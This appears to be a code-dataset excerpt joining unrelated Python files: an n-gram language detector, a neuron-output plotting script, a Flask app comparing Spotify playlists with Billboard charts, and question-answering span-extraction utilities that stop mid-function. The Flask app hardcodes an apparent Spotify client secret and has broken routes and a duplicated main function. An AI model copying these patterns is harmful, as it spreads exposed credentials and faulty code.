if not isinstance(letter, str) or letter not in self.storage or letter == '':
return -1
return self.storage[letter]
def update(self, corpus: tuple) -> int:
"""
Fills a storage by letters from the corpus
:param corpus: a tuple of sentences
:return: 0 if succeeds, 1 if not
"""
if not isinstance(corpus, tuple):
return 1
for sentence in corpus:
for token in sentence:
for letter in token:
self._put_letter(letter)
return 0
# 6
def encode_corpus(storage: LetterStorage, corpus: tuple) -> tuple:
"""
Encodes sentences by replacing letters with their ids
:param storage: an instance of the LetterStorage class
:param corpus: a tuple of sentences
:return: a tuple of the encoded sentences
"""
if not isinstance(storage, LetterStorage) or not isinstance(corpus, tuple):
return ()
encoded_corpus = []
for element in corpus:
list_element = []
for word in element:
list_element.append(tuple([storage.get_id_by_letter(letter) for letter in word]))
encoded_corpus.append(tuple(list_element))
return tuple(encoded_corpus)
# 6
class NGramTrie:
def __init__(self, n: int):
self.size = n
self.n_grams = ()
self.n_gram_frequencies = {}
self.n_gram_log_probabilities = {}
def fill_n_grams(self, encoded_text: tuple) -> int:
"""
Extracts n-grams from the given sentence, fills the field n_grams
:return: 0 if succeeds, 1 if not
"""
if not isinstance(encoded_text, tuple):
return 1
list_n_grams = []
for element in encoded_text:
n_grams_sentence = []
for token in element:
n_grams_token = []
for ind in range(len(token) - self.size + 1):
n_grams_token.append(tuple(token[ind:ind + self.size]))
n_grams_sentence.append(tuple(n_grams_token))
list_n_grams.append(tuple(n_grams_sentence))
self.n_grams = tuple(list_n_grams)
return 0
def calculate_n_grams_frequencies(self) -> int:
"""
Fills in the n-gram storage from a sentence, fills the field n_gram_frequencies
:return: 0 if succeeds, 1 if not
"""
if not self.n_grams:
return 1
for element in self.n_grams:
for token in element:
for n_gram in token:
self.n_gram_frequencies[n_gram] = self.n_gram_frequencies.get(n_gram, 0) + 1
return 0
def calculate_log_probabilities(self) -> int:
"""
Gets log-probabilities of n-grams, fills the field n_gram_log_probabilities
:return: 0 if succeeds, 1 if not
"""
if not self.n_gram_frequencies:
return 1
for element in self.n_gram_frequencies:
probab = self.n_gram_frequencies[element] / sum([self.n_gram_frequencies[n_gram]
for n_gram in self.n_gram_frequencies
if n_gram[0] == element[0]])
self.n_gram_log_probabilities[element] = log(probab)
return 0
def top_n_grams(self, k: int) -> tuple:
"""
Gets k most common n-grams
:return: a tuple with k most common n-grams
"""
if not isinstance(k, int) or k < 0:
return ()
top = sorted(self.n_gram_frequencies, key=self.n_gram_frequencies.get, reverse=True)
return tuple(top[:k])
# 8
class LanguageDetector:
def __init__(self, trie_levels: tuple = (2,), top_k: int = 10):
self.trie_levels = trie_levels
self.top_k = top_k
self.n_gram_storages = {}
def new_language(self, encoded_text: tuple, language_name: str) -> int:
"""
Fills NGramTries with regard to the trie_levels field
:param encoded_text: an encoded text
:param language_name: a language
:return: 0 if succeeds, 1 if not
"""
if not isinstance(encoded_text, tuple) or not isinstance(encoded_text[0], tuple)\
or not isinstance(language_name, str):
return 1
self.n_gram_storages[language_name] = {}
for element in self.trie_levels:
storage_language = NGramTrie(element)
storage_language.fill_n_grams(encoded_text)
storage_language.calculate_n_grams_frequencies()
storage_language.calculate_log_probabilities()
self.n_gram_storages[language_name][element] = storage_language
return 0
@staticmethod
def _calculate_distance(first_n_grams: tuple, second_n_grams: tuple) -> int:
"""
Calculates distance between top_k n-grams
:param first_n_grams: a tuple of the top_k n-grams
:param second_n_grams: a tuple of the top_k n-grams
:return: a distance
"""
if not isinstance(first_n_grams, tuple) or not isinstance(second_n_grams, tuple):
return -1
if (first_n_grams and not isinstance(first_n_grams[0], (tuple, str))) \
or (second_n_grams and not isinstance(second_n_grams[0], (tuple, str))):
return -1
distance = 0
for index_1, n_gam in enumerate(first_n_grams):
if n_gam in second_n_grams:
distance += abs(second_n_grams.index(n_gam) - index_1)
else:
distance += len(second_n_grams)
return distance
def detect_language(self, encoded_text: tuple) -> dict:
"""
Detects the language the unknown text is written in using the function _calculate_distance
:param encoded_text: a tuple of sentences with tuples of tokens split into letters
:return: a dictionary where a key is a language, a value – the distance
"""
if not isinstance(encoded_text, tuple):
return {}
detect_language_dict = {}
for language in self.n_gram_storages:
language_dis = []
for size in self.trie_levels:
unknown_n_gram = NGramTrie(size)
unknown_n_gram.fill_n_grams(encoded_text)
unknown_n_gram.calculate_n_grams_frequencies()
top_unknown_n_gram = unknown_n_gram.top_n_grams(self.top_k)
top_language = self.n_gram_storages[language][size].top_n_grams(self.top_k)
language_dis.append(self._calculate_distance(top_unknown_n_gram, top_language))
if language_dis:
detect_language_dict[language] = mean(language_dis)
return detect_language_dict
# 10
class ProbabilityLanguageDetector(LanguageDetector):
def _calculate_sentence_probability(self, n_gram_storage: NGramTrie, sentence_n_grams: tuple) -> float:
"""
Calculates sentence probability
:param n_gram_storage: a filled NGramTrie with log-probabilities
:param sentence_n_grams: n-grams from a sentence
:return: a probability of a sentence
"""
pass
def detect_language(self, encoded_text: tuple) -> dict:
"""
Detects the language the unknown sentence is written in using sentence probability in different languages
:param encoded_text: a tuple of sentences with tuples of tokens split into letters
:return: a dictionary with language_name: probability
"""
pass
| StarcoderdataPython |
1740652 | import argparse
import sys
import numpy as np
import itertools
# visualization libraries
import matplotlib.pyplot as plt
import seaborn as sns
plt.style.use('classic')
import numpy as np
import pandas as pd
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Data Collector for neuron outputs')
parser.add_argument('neuron_output_data_filepath', type=str, help='where is the neuron output data?')
parser.add_argument('neuron1', type=int, help='1st neuron to analyze')
parser.add_argument('neuron2', type=int, help='2nd neuron to analyze')
args = parser.parse_args()
neuronOutput = np.load(args.neuron_output_data_filepath)
neuronOutput = np.transpose(neuronOutput) # the neuron output needs to be transposed for covariance calculation
#dual variable distribution
data = np.column_stack((neuronOutput[args.neuron1],neuronOutput[args.neuron2]))
data = pd.DataFrame(data, columns=['neuron ' + str(args.neuron1) + ' stat distribution' , 'neuron ' + str(args.neuron2) + ' stat distribution'])
with sns.axes_style('white'):
sns.jointplot('neuron ' + str(args.neuron1) + ' stat distribution' , 'neuron ' + str(args.neuron2) + ' stat distribution', data, kind='kde');
plt.savefig(fname = 'Distribution of ' + str(args.neuron1) + ' and ' + str(args.neuron2) + ' Neurons output')
plt.clf()
#single variable distribution
sns.distplot(neuronOutput[args.neuron1], hist=True, kde=True,
bins=int(40), color = 'darkblue',
hist_kws={'edgecolor':'black'},
kde_kws={'linewidth': 4})
plt.title('Histogram of ' + str(args.neuron1) + ' Neurons output')
plt.xlabel('output')
plt.ylabel('occurences')
plt.savefig('Histogram of ' + str(args.neuron1) + ' Neurons output')
plt.clf()
sns.distplot(neuronOutput[args.neuron2], hist=True, kde=True,
bins=int(40), color = 'darkblue',
hist_kws={'edgecolor':'black'},
kde_kws={'linewidth': 4})
plt.title('Histogram of ' + str(args.neuron2) + ' Neurons output')
plt.xlabel('output')
plt.ylabel('occurences')
plt.savefig('Histogram of ' + str(args.neuron2) + ' Neurons output')
| StarcoderdataPython |
1946753 | <filename>app.py
import billboard
import spotipy
import os
from spotipy.oauth2 import SpotifyOAuth
from flask import Flask, session, request, redirect, render_template
from flask_session import Session
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(64)
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_FILE_DIR'] = './.flask_session/'
Session(app)
scope = "user-library-read"
os.environ['SPOTIPY_CLIENT_ID'] = '4ee59bcc14e443ce91bbfa177eb50c23' #Secrets found in the secrets.py folder
os.environ['SPOTIPY_CLIENT_SECRET'] = '34f6fefa1b6f4acc8ea11ee89c4df6d3'
os.environ['SPOTIPY_REDIRECT_URI'] = 'http://127.0.0.1:8080/login'
sp = spotipy.Spotify(auth_manager=SpotifyOAuth(scope=scope))
caches_folder = './.spotify_caches/' #Cache path for clearing session
if not os.path.exists(caches_folder):
os.makedirs(caches_folder)
def session_cache_path():
return caches_folder + session.get('uuid') #Gets path
@app.route('/')
def main():
return render_template('home.html') #initial path
input_playlist = '4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw' #ONLY USE FOR DEBUGGING
@app.route('/loading')
def optionselect():
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) #gets token for OAuth
if not auth_manager.get_cached_token():
return redirect('/') #if no token, redirect back home
return render_template('loading.html') #render options.html
@app.route('/options)')
def optionselect2():
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) #gets token for OAuth
if not auth_manager.get_cached_token():
return redirect('/') #if no token, redirect back home
return render_template('options.html')
@app.route('/results)')
def results():
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path()) #gets token for OAuth
if not auth_manager.get_cached_token():
return redirect('/') #if no token, redirect back home
return render_template('results.html',thing_one=main())
@app.route('/result')
def result():
return render_template('result.html',thing_one=main(id))
def getPlaylistID():
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path())
sp1 = spotipy.Spotify(auth_manager=auth_manager)
user_playlist = sp1.user_playlists(user=get_user_id(),limit=1,offset=0)
# for item in user_playlist:
# print(item)
playlist_Data = user_playlist['items'][0]
playlist_ID = playlist_Data['id']
return playlist_ID
def get_user_id():
auth_manager = spotipy.oauth2.SpotifyOAuth(cache_path=session_cache_path())
sp1 = spotipy.Spotify(auth_manager=auth_manager)
return str(sp1.me()['id'])
def main(inputplaylist):
input_playlist = '4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw' #ONLY USE FOR DEBUGGING
# playlists = sp.user_playlists('spotify')
playlists = sp.playlist(playlist_id=inputplaylist, fields=None)
songs = list()
artists = list()
dates = list()
for i in range(len(playlists['tracks']['items'])):
if ' (' in playlists['tracks']['items'][i]['track']['name']:
idx = playlists['tracks']['items'][i]['track']['name'].index(' (')
songs.append(playlists['tracks']['items'][i]['track']['name'][:idx])
else:
songs.append(playlists['tracks']['items'][i]['track']['name'])
artists.append(playlists['tracks']['items'][i]['track']['artists'][0]['name'])
dates.append(playlists['tracks']['items'][i]['added_at'][:7])
print(songs)
print(artists)
print(dates)
newdate = list()
bill = {}
for i in range(len(songs)):
if dates[i] not in bill.keys():
bill[dates[i]] = billboard.ChartData('hot-100', date=dates[i] + '-01', fetch=True, timeout=25)
billsongs = list()
billartist = list()
count = 0
for i in range(len(songs)):
for j in range(100):
billsongs.append(bill[dates[i]][j].title.lower())
billartist.append(bill[dates[i]][j].artist.lower())
# print(songs[i] + billsongs[i])
# print(artists[i] + billartist[i])
# if songs[i].lower() == billsongs[i].lower() and artists[i].lower() == billartist[i].lower():
# count += 1
for i in range(len(songs)):
if (songs[i].lower() in billsongs):
print(songs[i] + ' ' + artists[i] + ' ')
print(billsongs[i] + ' ' + billartist[i] + ' ')
count += 1
# print(songs)
# print(billsongs)
print(count)
print(len(songs))
per = round((count/len(songs)* 100))
print(per)
print('You are ' + str(per) + '% basic')
# total = len(songs)
# print(total)
# print(count/total)
# print(playlists['tracks']['items'][1]['added_at'][:10])
# def main():
# chart = billboard.ChartData('hot-100')
# chart1 = billboard.ChartData('hot-100',date='2015-05-22',fetch=True, timeout=25)
# chart.title
# song = chart[0] # Get no. 1 song on chart
# print(chart1)
if __name__ == '__main__':
main(inputplaylist='4Hbq8z7KWYVJtQQDVmN0Kf?si=HHr40zMuS7WTyJu6HoQ-fw') | StarcoderdataPython |
3387006 | import math
import json
import pathlib
import argparse
import collections
from functools import partial
from typing import List, Dict, Tuple
import torch
import numpy as np
from tqdm import tqdm
from torch.utils.data import TensorDataset
from torch.functional import Tensor
from transformers.models.bert.tokenization_bert import BasicTokenizer
from transformers.data.processors.squad import (
SquadExample,
SquadFeatures,
squad_convert_example_to_features,
squad_convert_example_to_features_init,
)
from .tokenization import RecconSpanExtractionTokenizer
from .evaluate_squad import compute_f1
from .data_class import RecconSpanExtractionArguments
def parse_args_and_load_config(
config_path: str = "config/span_extraction_config.json",
) -> RecconSpanExtractionArguments:
"""Get config from config file using argparser
Returns:
RecconSpanExtractionArguments: RecconSpanExtractionArguments instance
"""
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default=config_path)
args = parser.parse_args()
cfg_path = pathlib.Path(__file__).parent / args.config
with open(cfg_path, "r") as cfg_file:
cfg = json.load(cfg_file)
span_extraction_args = RecconSpanExtractionArguments(**cfg)
return span_extraction_args
def get_all_evidence_utterance_from_conversation(
emotion: str, conversation_history: List[str]
) -> Dict[str, List[str]]:
"""Iterate through a conversation history to let each utterance be the evidence
utterance. The last utterance is treated as the target utterance. Ouput dictionary is
in a format which can be used with RecconSpanExtractionPreprocessor
Args:
emotion (str): Emotion of the target utterance
conversation_history (List[str]): List of utterance in a conversation. The
last utterance is used as the target utterance.
Returns:
Dict[str, List[str]]: Dictionary in a format that can be used with RecconSpanExtractionPreprocessor
The dictionary looks like this:
{'emotion': ['happiness'],
'target_utterance': ['......'],
'evidence_utterance': ['......'],
'conversation_history': ['......']}
"""
conversation_history_text = " ".join(conversation_history)
target_utterance = conversation_history[-1]
output = {
"emotion": [],
"target_utterance": [],
"evidence_utterance": [],
"conversation_history": [],
}
for evidence_utterance in conversation_history:
output["emotion"].append(emotion)
output["target_utterance"].append(target_utterance)
output["evidence_utterance"].append(evidence_utterance)
output["conversation_history"].append(conversation_history_text)
return output
class RecconSpanExtractionData(torch.utils.data.Dataset):
"""Class to create torch Dataset instance, which is the required data type
for Transformer's Trainer
Args:
dataset (TensorDataset): TensorDataset object
for_predict (bool, optional): Option to set for predict. Defaults to False.
"""
def __init__(self, dataset: TensorDataset, for_predict: bool = False) -> None:
self.dataset = dataset
self.for_predict = for_predict
def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:
"""Get a dictionary of the selected instance for each batch
Args:
idx (int): idx to select instances for each batch
Returns:
(Dict): dictionary containing input_ids, attention_mask and token_type_ids
of the selected instance
"""
item = {}
if self.for_predict:
(input_ids, attention_mask, token_type_ids, _, _, _) = self.dataset[idx]
item["input_ids"] = input_ids
item["attention_mask"] = attention_mask
item["token_type_ids"] = token_type_ids
else:
(
input_ids,
attention_mask,
token_type_ids,
start_positions,
end_positions,
_,
_,
_,
) = self.dataset[idx]
item["input_ids"] = input_ids
item["attention_mask"] = attention_mask
item["token_type_ids"] = token_type_ids
item["start_positions"] = start_positions
item["end_positions"] = end_positions
return item
def __len__(self) -> int:
"""Returns length of dataset
Returns:
int: length of the dataset attribute
"""
return len(self.dataset)
class InputFeatures(object):
"""A single set of features of data."""
def __init__(
self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
cls_index,
p_mask,
paragraph_len,
start_position=None,
end_position=None,
is_impossible=None,
):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.cls_index = cls_index
self.p_mask = p_mask
self.paragraph_len = paragraph_len
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def truncate_to_max_length(
feature: List[SquadFeatures], max_length: int
) -> List[SquadFeatures]:
"""Truncate length of SquadFeatures' attributes
Args:
feature (List[SquadFeatures]): list of SquadFeatures
max_length (int): set maximum length of tokens
Returns:
List[SquadFeatures]: list of truncated SquadFeatures
"""
feature[0].input_ids = feature[0].input_ids[:max_length]
feature[0].p_mask = feature[0].p_mask[:max_length]
feature[0].token_type_ids = feature[0].token_type_ids[:max_length]
feature[0].tokens = feature[0].tokens[:max_length]
feature[0].attention_mask = feature[0].attention_mask[:max_length]
return feature
def squad_convert_examples_to_features(
examples: List[SquadExample],
tokenizer: RecconSpanExtractionTokenizer,
max_seq_length: int,
doc_stride: int,
max_query_length: int,
is_training: bool,
padding_strategy: str = "max_length",
tqdm_enabled: bool = True,
) -> Tuple[List[SquadFeatures], TensorDataset]:
"""[summary]
Args:
examples (List[SquadExample]): list of SquadExample
tokenizer (RecconSpanExtractionTokenizer): RecconSpanExtractionTokenizer from sgnlp
max_seq_length (int): set max_seq_length
doc_stride (int): set doc_stride
max_query_length (int): set max_query_length
is_training (bool): set is_training
padding_strategy (str, optional): set padding_strategy. Defaults to "max_length".
tqdm_enabled (bool, optional): set tqdm_enabled. Defaults to True.
Returns:
Tuple[List[SquadFeatures], TensorDataset]: Contains list of SquadFeatures and TensorDataset
"""
features = []
squad_convert_example_to_features_init(tokenizer)
annotate_ = partial(
squad_convert_example_to_features,
max_seq_length=max_seq_length,
doc_stride=doc_stride,
max_query_length=max_query_length,
padding_strategy=padding_strategy,
is_training=is_training,
)
features = [
truncate_to_max_length(annotate_(example), max_seq_length)
for example in tqdm(examples, disable=not tqdm_enabled)
]
new_features = []
unique_id = 1000000000
example_index = 0
for example_features in tqdm(
features,
total=len(features),
desc="add example index and unique id",
disable=not tqdm_enabled,
):
if not example_features:
continue
for example_feature in example_features:
example_feature.example_index = example_index
example_feature.unique_id = unique_id
new_features.append(example_feature)
unique_id += 1
example_index += 1
features = new_features
del new_features
# Convert to Tensors and build dataset
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_attention_masks = torch.tensor(
[f.attention_mask for f in features], dtype=torch.long
)
all_token_type_ids = torch.tensor(
[f.token_type_ids for f in features], dtype=torch.long
)
all_cls_index = torch.tensor([f.cls_index for f in features], dtype=torch.long)
all_p_mask = torch.tensor([f.p_mask for f in features], dtype=torch.float)
all_is_impossible = torch.tensor(
[f.is_impossible for f in features], dtype=torch.float
)
if not is_training:
all_feature_index = torch.arange(all_input_ids.size(0), dtype=torch.long)
dataset = TensorDataset(
all_input_ids,
all_attention_masks,
all_token_type_ids,
all_feature_index,
all_cls_index,
all_p_mask,
)
else:
all_start_positions = torch.tensor(
[f.start_position for f in features], dtype=torch.long
)
all_end_positions = torch.tensor(
[f.end_position for f in features], dtype=torch.long
)
dataset = TensorDataset(
all_input_ids,
all_attention_masks,
all_token_type_ids,
all_start_positions,
all_end_positions,
all_cls_index,
all_p_mask,
all_is_impossible,
)
return features, dataset
def get_examples(
examples_to_process: List[Dict[str, torch.Tensor]], is_training: bool = True
) -> List[SquadExample]:
"""Converts list of dict of train data to list of SquadExample
Args:
examples_to_process (List[Dict]): list of train data
is_training (bool, optional): option to set is_training. Defaults to True.
Raises:
TypeError: examples_to_process should be a list of examples.
Returns:
List[SquadExample]: list of SquadExample
"""
if not isinstance(examples_to_process, list):
raise TypeError("Input should be a list of examples.")
examples = []
for paragraph in examples_to_process:
context_text = paragraph["context"]
for qa in paragraph["qas"]:
qas_id = qa["id"]
question_text = qa["question"]
start_position_character = None
answer_text = None
answers = []
if "is_impossible" in qa:
is_impossible = qa["is_impossible"]
else:
is_impossible = False
if not is_impossible:
if is_training:
answer = qa["answers"][0]
answer_text = answer["text"]
start_position_character = answer["answer_start"]
else:
answers = qa["answers"]
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
context_text=context_text,
answer_text=answer_text,
start_position_character=start_position_character,
title=None,
is_impossible=is_impossible,
answers=answers,
)
examples.append(example)
return examples
def load_examples(
examples: List[Dict[str, torch.Tensor]],
tokenizer: RecconSpanExtractionTokenizer,
max_seq_length: int = 512,
doc_stride: int = 512,
max_query_length: int = 512,
evaluate: bool = False,
output_examples: bool = False,
) -> TensorDataset:
"""Convert list of examples to TensorDataset
Args:
examples (List[Dict[str, torch.Tensor]]): train data
tokenizer (RecconSpanExtractionTokenizer): RecconSpanExtractionTokenizer from sgnlp
max_seq_length (int, optional): set max_seq_length. Defaults to 512.
doc_stride (int, optional): set max_seq_length. Defaults to 512.
max_query_length (int, optional): set max_seq_length. Defaults to 512.
evaluate (bool, optional): option to use for evaluation. Defaults to False.
output_examples (bool, optional): option to output examples. Defaults to False.
Returns:
TensorDataset: train data converted to TensorDataset
"""
examples = get_examples(examples, is_training=not evaluate)
features, dataset = squad_convert_examples_to_features(
examples=examples,
tokenizer=tokenizer,
max_seq_length=max_seq_length,
doc_stride=doc_stride,
max_query_length=max_query_length,
is_training=not evaluate,
tqdm_enabled=True,
)
if output_examples:
return dataset, examples, features
return dataset
def calculate_results(truth, predictions, **kwargs):
truth_dict = {}
questions_dict = {}
for item in truth:
for answer in item["qas"]:
if answer["answers"]:
truth_dict[answer["id"]] = answer["answers"][0]["text"]
else:
truth_dict[answer["id"]] = ""
questions_dict[answer["id"]] = answer["question"]
correct = 0
incorrect = 0
similar = 0
correct_text = {}
incorrect_text = {}
similar_text = {}
predicted_answers = []
true_answers = []
for q_id, answer in truth_dict.items():
predicted_answers.append(predictions[q_id])
true_answers.append(answer)
if predictions[q_id].strip() == answer.strip():
correct += 1
correct_text[q_id] = answer
elif (
predictions[q_id].strip() in answer.strip()
or answer.strip() in predictions[q_id].strip()
):
similar += 1
similar_text[q_id] = {
"truth": answer,
"predicted": predictions[q_id],
"question": questions_dict[q_id],
}
else:
incorrect += 1
incorrect_text[q_id] = {
"truth": answer,
"predicted": predictions[q_id],
"question": questions_dict[q_id],
}
extra_metrics = {}
for metric, func in kwargs.items():
extra_metrics[metric] = func(true_answers, predicted_answers)
result = {
"correct": correct,
"similar": similar,
"incorrect": incorrect,
**extra_metrics,
}
texts = {
"correct_text": correct_text,
"similar_text": similar_text,
"incorrect_text": incorrect_text,
}
return result, texts
RawResult = collections.namedtuple(
"RawResult", ["unique_id", "start_logits", "end_logits"]
)
def to_list(tensor):
return tensor.detach().cpu().tolist()
def _get_best_indexes(logits, n_best_size):
"""Get the n-best logits from a list."""
index_and_score = sorted(enumerate(logits), key=lambda x: x[1], reverse=True)
best_indexes = []
for i in range(len(index_and_score)):
if i >= n_best_size:
break
best_indexes.append(index_and_score[i][0])
return best_indexes
def _compute_softmax(scores):
"""Compute softmax probability over raw logits."""
if not scores:
return []
max_score = None
for score in scores:
if max_score is None or score > max_score:
max_score = score
exp_scores = []
total_sum = 0.0
for score in scores:
x = math.exp(score - max_score)
exp_scores.append(x)
total_sum += x
probs = []
for score in exp_scores:
probs.append(score / total_sum)
return probs
def get_best_predictions(
all_examples,
all_features,
all_results,
n_best_size,
max_answer_length,
do_lower_case,
verbose_logging,
version_2_with_negative,
null_score_diff_threshold,
):
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"],
)
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min null score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index],
)
)
if version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit,
)
)
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True,
)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"]
)
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
if pred.start_index > 0: # this is a non-null prediction
feature = features[pred.feature_index]
tok_tokens = feature.tokens[pred.start_index : (pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start : (orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(
tok_text, orig_text, do_lower_case, verbose_logging
)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit,
)
)
# if we didn't include the empty option in the n-best, include it
if version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit, end_logit=null_end_logit
)
)
# In very rare edge cases we could only have single null prediction.
# So we just create a nonce prediction in this case to avoid failure.
if len(nbest) == 1:
nbest.insert(
0, _NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0)
)
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
probs = _compute_softmax(total_scores)
nbest_json = []
for (i, entry) in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
assert len(nbest_json) >= 1
if not version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
score_diff = (
score_null
- best_non_null_entry.start_logit
- (best_non_null_entry.end_logit)
)
scores_diff_json[example.qas_id] = score_diff
if score_diff > null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
all_best = [
{
"id": id,
"answer": [answer["text"] for answer in answers],
"probability": [answer["probability"] for answer in answers],
}
for id, answers in all_nbest_json.items()
]
return all_best
def write_predictions(
all_examples,
all_features,
all_results,
n_best_size,
max_answer_length,
do_lower_case,
output_prediction_file,
output_nbest_file,
output_null_log_odds_file,
verbose_logging,
version_2_with_negative,
null_score_diff_threshold,
):
"""Write final predictions to the json file and log-odds of null if needed."""
# logger.info("Writing predictions to: %s" % (output_prediction_file))
# logger.info("Writing nbest to: %s" % (output_nbest_file))
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"],
)
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min null score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index],
)
)
if version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit,
)
)
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True,
)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"]
)
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
